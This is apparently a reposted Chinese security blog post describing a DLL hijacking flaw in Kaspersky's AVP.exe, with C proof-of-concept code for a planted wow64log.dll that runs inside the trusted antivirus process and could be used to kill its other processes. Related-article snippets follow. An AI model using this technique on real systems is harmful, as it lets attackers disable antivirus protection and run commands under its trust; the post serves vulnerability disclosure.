Kaspersky AVP.exe DLL 劫持

VSole2022-07-21 22:53:31

Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。

在Kaspersky AVP.exe进程尝试加载缺少的wow64log.dllDLL文件(在System32)。

通过DLL植入恶意文件,本地Windows管理员可以在这个受信任的AVP.exe进程的上下文中实现代码执行并杀死其他进程,从而在无法检测和清除病毒的杀毒软件上实现拒绝服务和以卡巴斯基的身份执行任意命令。

版本

卡巴斯基安全软件

AVP.exe版本

Kaspersky Password Manager Service

卡巴斯基安全软件启动的进程为:

Kaspersky Password Manager Service启动的进程为:

ProCess Monitor

AVP.exe 加载不存在的wow64log.dll,路径为C:\windows\System32\

Avpui.exe同样加载不存在的Wow64log.dll,路径为C:\windows\System32\

kpm.exe同样加载不存在的Wow64log.dll,路径为C:\windows\System32\

wow64log.dll与 WoW64 Windows 机制有关,该机制允许在 64 位 Windows 上运行 32 位程序。该子系统会自动尝试加载它,但是它不存在于任何公共 Windows 版本中。

C:\Windows\System (Windows95/98/Me)C:\WINNT\System32(WindowsNT/2000)C:\Windows\System32 (Windows XP,Vista,7,8,10)

如果是64位文件C:\Windows\SysWOW64

作为管理员,我们可以构造恶意 wow64log.dll 文件复制到 System32 。

例如:

#include "pch.h"#include #include #include #include #include 
BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call,  LPVOID lpReserved){  STARTUPINFO si = { sizeof(si) };  PROCESS_INFORMATION pi;  CreateProcess(TEXT("C:\\Windows\\System32\\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
  switch (ul_reason_for_call)  {  case DLL_PROCESS_ATTACH:    char szFileName[MAX_PATH + 1];    GetModuleFileNameA(NULL, szFileName, MAX_PATH + 1);
    //check if we are injected in an interesting McAfee process    if (strstr(szFileName, "avp") != NULL      //|| strstr(szFileName, "mcshield") != NULL      || strstr(szFileName, "avp.exe") != NULL      ) {      DisableThreadLibraryCalls(hModule);    }    else    {
    }
  case DLL_THREAD_ATTACH:  case DLL_THREAD_DETACH:  case DLL_PROCESS_DETACH:    //log("detach");    break;  }  return TRUE;}

手动复制在目标文件目录中,然后启动卡巴斯基,可以看到加载了我们的Wow64log.dll

启动Kaspersky Password Manager Service

加载了我们的恶意DLL并执行了

卡巴斯基具有自我保护机制,即使管理员也无法终止或注入Avp.exe /avpui.exe等等 进程。但似乎卡巴斯基家族的所有进程都认为其他卡巴斯基进程在自我保护方面是“受信任的”。因此,如果我们设法在一个上下文中执行代码,我们就可以“攻击”并杀死其进程和在卡巴斯基中执行任意命令等等。

我们可以编译一个恶意的dll利用卡巴斯基的进程去kill其它卡巴斯基的进程。

也可以在卡巴是安全上下文中执行我们的shellcode 例如:

卡巴斯基dll劫持
本作品采用《CC 协议》,转载必须注明作者和本文链接
Kaspersky AVP.exe DLL 劫持
2022-07-21 22:53:31
Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况
每个供应商的产品都有问题,攻击者只要已经在系统上就可以提升权限。 CyberArk最近一项研究发现,公司企业用来防御恶意软件攻击的大多数安全工具本身易遭漏洞利用,可使攻击者能够在受感染的系统上提升权限。 CyberA...
在2022年2月,卡巴斯基实验室的研究人员首次观察到将shellcode放入Windows事件日志的技术。该技术允许在文件系统中隐藏“无文件”最后stager的木马。这种对活动中事件日志的关注不仅限于存储 shellcode。Dropper 模块还修复了与事件跟踪 (ETW) 和反恶意软件扫描接口 (AMSI) 相关的 Windows 原生 API 函数,以使感染过程更加隐蔽。
安全研究人员近期注意到一个利用 Windows 事件日志来存储恶意软件的活动,这项技术此前并没有被记录用于黑客攻击。这种方法使攻击者能够在文件系统中植入无文件的恶意软件,这种攻击充满了技术和模块,旨在尽可能保持活动的隐蔽性。
今天是微软 2023 年 4 月的补丁星期二,安全更新修复了一个被积极利用的零日漏洞,共计 97 个漏洞。七个漏洞因允许远程代码执行而被归类为“严重”,这是最严重的漏洞。如果某个漏洞被公开披露或被积极利用但没有可用的官方修复程序,Microsoft 会将其归类为零日漏洞。因此,强烈建议 Microsoft Office 用户尽快安装今天的安全更新。
威胁团伙利用TeamCity CVE-2023-42793漏洞展开攻击
今年早些时候,受欢迎的VoIP程序3CXDesktopApp的木马化版本被用于“套娃式”供应链攻击。攻击者能够将恶意代码嵌入到libffmpeg媒体处理库中,以便从他们的服务器下载有效负载。
研究人员称,作为该过程的一部分,DLL被绑定到Windows注册表项中的目标进程,但攻击者可以用恶意DLL替换真正的DLL。反病毒应用程序是防止任何恶意软件运行的系统的主要防御。研究人员表示,目前市场上的大多数安全产品都容易受到双重代理攻击。
总共发现了多达80个恶意模块。DarkUniverse目前尚未被公开公布,也不清楚2017年之后它发生了什么。成功利用这些漏洞后,由四个模块组成的自定义恶意软件将被发送到受感染的系统。研究人员将APT称为“PuzzleMaker”。它被称为“USB Thief”,由六个文件组成,其中两个是配置文件,而其他四个是可执行文件。这种恶意软件并不普遍,极有可能用于涉及人力资源的高度针对性攻击。到目前为止,尚未发现该攻击者与任何已知的APT组织之间存在联系。
Ducktail 窃取恶意软件背后的越南威胁行为者与 2023 年 3 月至 10 月初开展的一项新活动有关,该活动针对印度的营销专业人士,旨在劫持 Facebook 企业帐户。
VSole
网络安全专家